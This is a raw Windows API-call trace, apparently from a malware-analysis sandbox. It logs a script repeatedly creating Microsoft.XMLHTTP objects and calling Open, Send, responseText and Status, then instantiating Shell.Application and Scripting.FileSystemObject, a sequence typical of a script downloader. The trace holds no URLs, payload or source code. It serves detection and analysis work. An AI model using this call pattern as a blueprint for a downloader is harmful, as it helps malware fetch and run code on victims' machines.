	[0848.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0848.254] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0848.254] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0848.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0848.254] ??2@YAPEAX_K@Z () returned 0x62f310
	[0848.254] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0848.254] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0848.254] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0848.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0848.254] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0848.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0848.254] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0848.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0848.255] longjmp () 
	[0848.255] longjmp () 
	[0848.255] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0848.255] SysStringLen (param_1=0x0) returned 0x0
	[0848.255] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0848.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0848.255] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0848.255] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0848.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0848.255] ??2@YAPEAX_K@Z () returned 0x62f330
	[0848.256] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0848.256] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0848.256] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0848.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0848.256] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0848.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0848.256] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0848.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0848.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0848.256] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0848.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0849.416] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0849.416] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0849.416] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0849.416] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0849.417] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0849.417] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0849.417] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0849.417] SysStringLen (param_1=0x0) returned 0x0
	[0849.417] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0849.417] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0849.417] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0849.417] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0849.417] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0849.418] ??2@YAPEAX_K@Z () returned 0x62f350
	[0849.418] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0849.418] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0849.418] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0849.418] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0849.418] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0849.418] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0849.418] SysStringLen (param_1=0x0) returned 0x0
	[0849.418] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0849.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0849.436] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0849.437] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0849.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0849.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0849.437] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0851.230] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0851.230] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0851.230] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0851.231] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0851.231] SysStringLen (param_1=0x0) returned 0x0
	[0851.231] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0851.232] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0851.232] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0851.232] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0851.232] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0851.232] ??2@YAPEAX_K@Z () returned 0x62f330
	[0851.232] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f330) 
	[0851.232] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0851.232] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0851.232] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0851.232] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0851.232] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0851.232] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0851.235] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0851.235] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0851.235] SysStringLen (param_1=0x0) returned 0x0
	[0851.235] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0851.235] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0851.236] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0851.236] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0851.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0851.236] ??2@YAPEAX_K@Z () returned 0x62f310
	[0851.236] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0851.236] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0851.236] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0851.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0851.236] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0851.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0851.236] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0851.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0851.237] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0851.237] SysStringLen (param_1=0x0) returned 0x0
	[0851.237] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
